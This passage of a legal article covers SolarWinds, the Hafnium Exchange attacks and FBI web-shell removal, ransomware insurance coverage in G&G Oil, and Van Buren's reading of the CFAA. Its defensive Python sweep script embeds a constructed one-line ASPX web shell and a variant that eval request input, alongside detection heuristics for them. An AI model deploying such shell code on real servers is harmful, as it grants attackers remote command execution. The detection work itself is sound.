II. SolarWinds Incident—Creation of Persistently Insecure, Digital-Based Systems
In mid-December 2020, software firm SolarWinds disclosed that its information technology monitoring platform, Orion, had been compromised an indeterminate number of months earlier. Malicious actors (reportedly Russia’s foreign intelligence service, the SVR) had carried out a sophisticated, stealthy intrusion and remained undetected in targeted systems and networks for at least nine months. The intruders planted malware “in a routine software upgrade” of SolarWinds’ Orion program, which “keeps a watchful eye on all the various components in a company’s network,” so that the trojanized update was delivered to customers downstream in SolarWinds’ software supply chain.
On December 13, 2020, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (“CISA”) issued Emergency Directive 21-01 (“ED 21-01”). ED 21-01 appears to have been premised on several features of the incident: first, the unusual scope and severity of the attack (“over 17,000 organizations downloaded the infected back door”); second, the lengthy period during which it continued without detection; and third, a determination that the incident created “persistence in the [computer network] environment,” with the result that it appears uncertain whether it will be possible to eradicate the malicious actors and the malware they secreted in targeted systems. ED 21-01 cautioned: “SolarWinds Orion products . . . are currently being exploited by malicious actors. This tactic permits an attacker to gain access to network traffic management systems. Disconnecting affected devices . . . is the only known mitigation measure currently available.” Estimates made in March 2021 predicted that agencies attempting to rebuild their networks from scratch might need “in the neighborhood of 12 to 18 months.”
Law firms whose clients included any of the affected enterprises might still be at risk through digital communications with those clients. The electronic filing system that the federal courts use was also compromised. In the immediate aftermath, some security experts viewed the attack as “an inflection point” and believed it should be recognized as reflecting certain paradigm shifts, including:
- The attack methods show that the intruders understood in detail the step-by-step procedures that software companies use internally to initiate, build, test, and release updates; this fact will (or should) “change the way that large enterprises think about the software they install and think about how they handle updates.”
- And worse, enterprises now need to ask “What if the hackers planted the seeds of future attacks during that nine months they explored SolarWinds’ customer networks—did they hide code for backdoors that will allow them to come and go as they please at a time of their choosing? . . . Will we find out later that the SolarWinds hack set the stage for something more sinister? . . . [N]ations are targeting [the] private sector . . . .”
In early March 2021, Microsoft disclosed that on-premises installations of its Exchange Server email and calendar software had been the target of a highly sophisticated cyberattack, reportedly executed by a malicious actor, known as Hafnium, that is assessed to operate out of the People’s Republic of China but that “conducts its operations primarily from leased virtual private servers (VPS) in the United States.” Microsoft explained that Hafnium has historically selected U.S. entities as its main targets, with the aim of exfiltrating data from enterprises in several industry sectors, including law firms. The victims of the hack reportedly extended to upwards of 30,000 Microsoft customers, including federal agencies and private enterprises (particularly small and medium size businesses).
The Hafnium attack started in January 2021, escalated in late February, and continued into March 2021. In response, Microsoft released multiple security updates or “patches.” When Microsoft observed that multiple bad actors continued to take advantage of unpatched systems “to attack organizations with on-premises Exchange Server,” Microsoft endeavored to aid defenders in investigating the attacks by releasing a set of “observed indicators of compromise” in the form of “malware hashes and known malicious file paths”; a week later, Microsoft released a “new one-click mitigation tool . . . to help customers who do not have dedicated security or IT teams to apply security updates for Microsoft Exchange Server.”
However, due in part to limitations in technical expertise at many commercial victims, hundreds of servers still carried the web shells Hafnium had installed. In response, the Federal Bureau of Investigation (“FBI”) sought and obtained judicial authorization to enter electronically many of the victims’ computer networks, search for and locate the “web shells” lodged there by Hafnium, and execute code that would cause those shells to issue a command to the company’s server that they be deleted. As the FBI explained to the District Court:
most of these victims are unlikely to remove the remaining web shells because the web shells are difficult to find due to their unique file names and paths or because these victims lack the technical ability to remove them on their own.
In short, without the knowledge of the affected enterprises, the FBI obtained a search warrant from a U.S. District Court “to seize and copy from Microsoft Exchange Servers located in the United States the web shells identified in [an attachment], and to delete the web shells from those servers.”
The FBI’s novel and extraordinary action did not provide complete remediation for affected enterprises. Removal of the web shells did not identify or remove any other malware that Hafnium may have secreted in each targeted enterprise’s servers and networks. Moreover, whatever vulnerabilities Hafnium may have exploited, it’s possible that the array of Microsoft’s security patches (over twenty-five of which Microsoft released in March and early April 2021) might not have addressed all the Exchange Server zero-day vulnerabilities known to the Hafnium intruders. It’s possible that the same or different intruders could “plant another web shell” and resume the intrusion, exfiltrate information, or modify key operational data to cause kinetic damage.
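The indicator-of-compromise sweep that Microsoft’s release of “malware hashes and known malicious file paths” was meant to enable, and the difficulty the FBI described (web shells hidden under unique file names and paths), can be made concrete with the following added example. It is illustrative code written for this page, not Microsoft’s or the FBI’s tooling; every hash, path pattern, content heuristic and sample file in it is constructed for the example and is not a published Hafnium indicator. It shows why hash matching finds a known shell even when it has been renamed and moved, why a path rule finds server-side scripts in a directory that should hold none, and why a content heuristic is still needed for variants whose hashes are unknown.

```python
"""IOC sweep for web-shell files: hash match, path-pattern match and a content heuristic.

Added illustration, not vendor tooling. All indicators and sample files are constructed.
"""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Constructed stand-in for a one-line ASPX web shell (illustrative text, not a real sample).
KNOWN_SHELL_BYTES = b'<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>'

# Hash-based IOCs. Derived here from the constructed sample so the example is self-contained;
# a real sweep would load vendor-published SHA-256 digests instead.
IOC_SHA256 = {hashlib.sha256(KNOWN_SHELL_BYTES).hexdigest()}

# Path-based IOC (constructed): a server-side .aspx page inside a directory that should only
# ever contain static client-side content.
IOC_PATH_PATTERNS = [re.compile(r"(?i)(^|/)aspnet_client/.*\.aspx$")]

# Content heuristic (constructed): a server-side script that both reads request input and
# calls eval(). Catches variants whose hashes are not on any list.
SCRIPT_SUFFIXES = {".aspx", ".asp", ".ashx", ".asmx"}
EVAL_RE = re.compile(rb"(?i)eval\s*\(")
REQUEST_RE = re.compile(rb"(?i)\bRequest\b")


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large files do not need to be read into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root: Path) -> Dict[str, List[str]]:
    """Return {relative_posix_path: [reasons]} for every file under root matching any IOC."""
    findings: Dict[str, List[str]] = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        reasons = []
        if sha256_file(path) in IOC_SHA256:
            reasons.append("hash")  # matches regardless of file name, extension or location
        if any(pat.search(rel) for pat in IOC_PATH_PATTERNS):
            reasons.append("path")
        if path.suffix.lower() in SCRIPT_SUFFIXES:
            data = path.read_bytes()
            if EVAL_RE.search(data) and REQUEST_RE.search(data):
                reasons.append("content")
        if reasons:
            findings[rel] = reasons
    return findings


# Constructed sample web root: one known shell in a suspicious path, the same shell renamed
# and moved, a variant shell with a different hash, and two benign files.
SAMPLE_FILES = {
    "aspnet_client/system_web/a1b2c3.aspx": KNOWN_SHELL_BYTES,
    "wwwroot_backup/cache.tmp": KNOWN_SHELL_BYTES,
    "owa/auth/zzz.aspx": b'<%@ Page Language="Jscript"%><% var c = Request["x"]; eval(c, "unsafe"); %>',
    "owa/auth/logon.aspx": b'<%@ Page Language="C#" %><html><body>Sign in</body></html>',
    "aspnet_client/system_web/script.js": b"document.title = 'ok';",
}


def build_sample_tree(root: Path) -> None:
    """Write the constructed sample files under root."""
    for rel, data in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)


def demo() -> Dict[str, List[str]]:
    """Build the sample tree in a temporary directory, sweep it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return sweep(root)


if __name__ == "__main__":
    for rel, why in demo().items():
        print(f"{rel}: {', '.join(why)}")
```

The renamed copy under `wwwroot_backup/cache.tmp` is caught only by its hash, the variant under `owa/auth/zzz.aspx` only by the content heuristic, and the legitimate sign-in page is not flagged at all; in practice the path and content rules are the ones that need tuning against a known-good server image, because hash lists are exact but stale the moment an attacker changes one byte.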
III. G&G Oil Co. of Indiana, Inc. v. Continental Western Insurance Co.
When advising clients on responses to a ransomware attack, there are multiple uncertainties. They include:
- Can we restore access to systems and data needed for resumption of at least degraded operations? (Possibly, but the prolonged disruption of Colonial Pipeline and other critical infrastructure targets of ransomware suggests many enterprises have not prepared sufficiently for that contingency.)
- Can we negotiate a reduction in the demanded payment? (Possibly. If the target is a hospital the attackers may be willing to consider reductions or even to “decrypt for free,” as one ransomware group, DoppelPaymer, says it will do, but the FBI “advises victims to avoid negotiating with hackers, arguing that paying ransoms incentivizes criminal behavior.”)
- Can we lawfully pay the intruders? (Possibly not, if there’s reason to believe the payment, without a license from the U.S. Department of the Treasury, Office of Foreign Assets Control (“OFAC”) will violate any of the U.S. economic sanctions regulations.)
- Can counsel’s firm ethically pay or advise on making such payment to a criminal? (Possibly, but it is peculiar that despite the multitude of ransomware attacks, no bar association in the United States has issued an ethics opinion that addresses that issue; apparently the sole ethics opinion to date comes from the Queensland Law Society, which addressed the issue of whether a law firm may ethically pay a ransom to recover access to client data in the firm’s computers:
On balance, the clear obligation to protect client interests tends to outweigh the general public policy objection to paying criminals. Payment of the ransom is therefore an option available to the firm once all of the competing alternatives have been considered. . . . If lawful, we are entitled to make the decision based on what we think will lead to the best outcome for the client and our firm . . . .
As an aside, if the attackers have had access to compromised systems there is a clear ethical duty to warn clients that this has occurred. So “pay up and keep quiet” is only possible where there is no way the intruders could have client data.
- If we pay, will the intruders release the encryption passwords or keys and restore our access to our data? (Possibly, but they may demand additional amounts; and that risk raises an equally salient question: did intruders exploit their access to modify critical data randomly, rendering the data unreliable and potentially hazardous if utilized?)
For any enterprise considering making a payment to hackers, a key question may be whether the insurer will view the payment and the costs imposed by the disruption of operations as covered by the terms of the issued policy. The Supreme Court of Indiana, in a case of first impression, answered that question under Indiana law in G&G Oil Co. of Indiana v. Continental Western Insurance Company.
In November 2017, hackers executed a ransomware attack on G&G Oil Co. of Indiana (“G&G”). Unable to access its servers and most workstations, G&G paid the demanded bitcoin ransom. But the hackers refused to restore G&G’s control over its servers and demanded an additional payment. G&G ultimately paid the additional ransom (for a total of $34,477.50) (“Ransom Payment”); the hackers sent passwords enabling G&G to decrypt and regain access to its servers.
G&G submitted a claim to Continental Western Insurance Company, the issuer of its multi-peril commercial policy. G&G relied on the policy’s Computer Fraud clause (“Computer Fraud Clause”), which read:
We will pay for loss of or damages to “money” . . . and “other property” resulting directly from the use of any computer to fraudulently cause a transfer of that property from inside the “premises” . . . .
a. To a person . . . outside those “premises”; or
b. To a place outside those “premises.”
Continental denied G&G’s claim on two grounds. First, G&G had not purchased an optional Computer Virus and Hacking Coverage (“Hacking Coverage”). Second, Continental viewed the Ransom Payment as a loss that did not result directly from the “use of a computer to fraudulently cause a transfer of G&G’s funds.”
G&G filed a complaint seeking a judgment requiring Continental to indemnify G&G for the Ransom Payment loss. The trial court granted Continental’s cross-motion for summary judgment. G&G appealed. The Court of Appeals of Indiana affirmed, adopting Continental’s argument that the hacker had not committed an act that qualified as “fraud.” With no “fraud” committed, the Court of Appeals reasoned, the hacker’s actions did not come within the Computer Fraud Clause’s coverage for use of a computer to “fraudulently cause” a transfer of money, nor did they “fraudulently cause” G&G to “purchase Bitcoin to pay as ransom.” The Court of Appeals seemingly viewed the hacker as an honest thief; although illegal, “there was no deception involved” in the hacker’s ransom demand. No deception, no fraud, no coverage by the Computer Fraud Clause for loss caused by “use of any computer to fraudulently cause a transfer” of money.
G&G appealed to the Supreme Court of Indiana, which reversed. The Supreme Court of Indiana found persuasive the Seventh Circuit’s definition of “fraud” (albeit in the context of bankruptcy): “it includes all surprise, trick, cunning, dissembling, and any unfair way by which another is cheated.” With that as a guide, the Supreme Court of Indiana construed the term “fraudulently cause a transfer” to mean “simply ‘to obtain by trick.’”
Applying that criterion, the court found neither party had demonstrated entitlement to summary judgment. G&G’s evidence fell short, because not every ransomware attack is perforce fraudulent. An enterprise’s cybersecurity becomes a gauge of whether a hacker needed to resort to a “trick.” As the court explained, “if no safeguards were put in place [by G&G], it is possible a hacker could enter a company’s servers unhindered and hold them hostage. There would be no trick there.” Continental’s evidence fell short for the same reason. The court found it unclear whether the hacker gained access to G&G’s computer systems by “trick.”
The court then addressed whether the Ransom Payment loss was one “resulting directly from the use of a computer” as required by the Policy’s Computer Fraud Clause. Continental argued that G&G’s “voluntary transfer of Bitcoin was an intervening cause that severed the causal chain of events” and thereby disconnected the Ransom Payment loss from a direct use of a computer. The court disagreed, finding that G&G’s Ransom Payment was only “voluntary” in the sense that G&G acted consciously. But the court sagaciously reasoned that “the payment more closely resembled one made under duress,” and therefore it was “not so remote that it broke the causal chain” required for G&G’s losses to have “resulted directly from the use of a computer.”
IV. Van Buren v. United States
Georgia police sergeant Van Buren asked an acquaintance, Albo, for a personal loan. Albo secretly recorded the request and shared it with a sheriff’s office, alleging Van Buren had tried to “shake him down” for cash. The FBI received the recorded conversation and set up a “sting” operation: Albo would offer Van Buren about $5,000 to search the state law enforcement computer database for a license plate “purportedly belonging to a woman whom Albo had met at a local strip club.” Van Buren agreed. Operating his patrol-car computer, he used credentials that gave him authorized access to the law enforcement database of license plate records. Van Buren searched the database, found the requested license-plate entry (unaware the FBI had created it), and told Albo he had the information. Van Buren’s use of the data violated his police department’s prohibition on use of police computers for personal purposes.
The federal government indicted Van Buren under the CFAA, alleging he accessed a computer while “exceed[ing] authorized access.” A jury convicted Van Buren and the Eleventh Circuit affirmed. The U.S. Supreme Court granted certiorari to resolve the split among the circuit courts in interpreting the scope of liability under the CFAA’s “exceeds authorized access” clause.
Government and defendant agreed that defendant had authorization to access the subject computer when he “used his patrol-car computer and valid credentials to log into the law enforcement database.” They disputed whether defendant was “entitled so to obtain” the license-plate record—if not, defendant violated the CFAA. Justice Barrett, writing the opinion of the Court (for a 6 to 3 majority), framed the issue as one of statutory construction: what did “so” mean in the context of that CFAA prohibition against exceeding “authorized access,” which the CFAA defines as occurring when anyone accesses “a computer with authorization and . . . use[s] such access to obtain . . . information in the computer that the accesser is not entitled so to obtain.”
Defendant argued that the disputed phrase “is not entitled so to obtain” means that if a person is authorized to access information in a computer, there is no violation of the CFAA even if he accesses or uses that information for an unauthorized purpose. The government argued that the CFAA is violated if a person is authorized to access the information but does so for an unauthorized purpose.
The Court agreed with the defendant. Explaining her conclusion, Justice Barrett offered a cogent spatial metaphor that referred to “access” and “authorization” as resembling a portcullis or gate “up-or-down.” Justice Barrett reasoned that defendant’s interpretation, unlike the government’s, treated the “without authorization” and “exceeds authorized access” clauses consistently:
Under Van Buren’s reading, liability under both clauses stems from a gates-up-or-down inquiry—one either can or cannot access a computer system, and one either can or cannot access certain areas within the system. And reading both clauses to adopt a gates-up-or-down approach aligns with the computer-context understanding of access as entry.
By contrast, the government’s reading would risk criminalizing “every violation of a computer-use policy,” turning “millions of otherwise law-abiding citizens” into criminals.
The Court concluded that defendant “did not ‘excee[d] authorized access’ to the database, as the CFAA defines that phrase, even though he obtained information from the database for an improper purpose.” The Court reversed the judgment of the Eleventh Circuit and remanded the case for further proceedings consistent with its opinion.
V. Conclusion—Pragmatic Lessons
When a HILF (high-impact, low-frequency) cyber event like SolarWinds occurs, the breached enterprises might never be able to determine with certitude whether the intruders have been expelled; whether their secreted malware has been contained, disabled, or eradicated; whether all adverse effects are over; or even whether the scope of the attack and the damage have been ascertained. Henceforth, counsel and clients may need to assume the persistent presence of malware, and even the continued presence of cyber actors, in the enterprise until it can be verified reliably that intruders and malware have indeed been eradicated. But at this time, the possibility of verifying that “all’s clear” in a digital system remains uncertain.
In light of the emergence of HILF events, counsel might see if it can coax a client to “stress test” and reevaluate its cyber security safeguards. This may require reevaluation of steps the enterprise has taken that facilitate remote work during the pandemic, but that may have sacrificed data safeguards.
The G&G Oil decision suggests that an insured enterprise may be disqualified from recovering on a claim for losses resulting from a ransom payment or disruption of its operations if a court determines that the intruders gained access, not with a “trick,” but through a security lapse or other security deficiency. Because the court treated the means of initial access as a question of fact, an enterprise’s forensic record of how the intruders got in (and of the safeguards that were in place at the time) may decide coverage as much as the policy language does.
After Van Buren, enterprises can no longer rely on the threat of criminal prosecution under the CFAA to deter personnel from violating workplace policies on the use of company data. If personnel have authority to access the computer, directory, and files containing the data, preventing insider threats and misuse of the data remains an enterprise responsibility.
Enterprise security is often designed to ask good people to do good things and relies on them to do so. Unfortunately, such security proves no match for the moment when good people err, are tricked by a clever social engineering ploy, or sour and enlist their ingenuity to do bad things with sensitive data. We might do better to limit our trust to where the consequences of misplaced trust are trivial. But what are we to do about systems where misplaced trust would cause catastrophic disruptions, and where the experience of recent HILF events teaches us that such systems remain persistently insecure?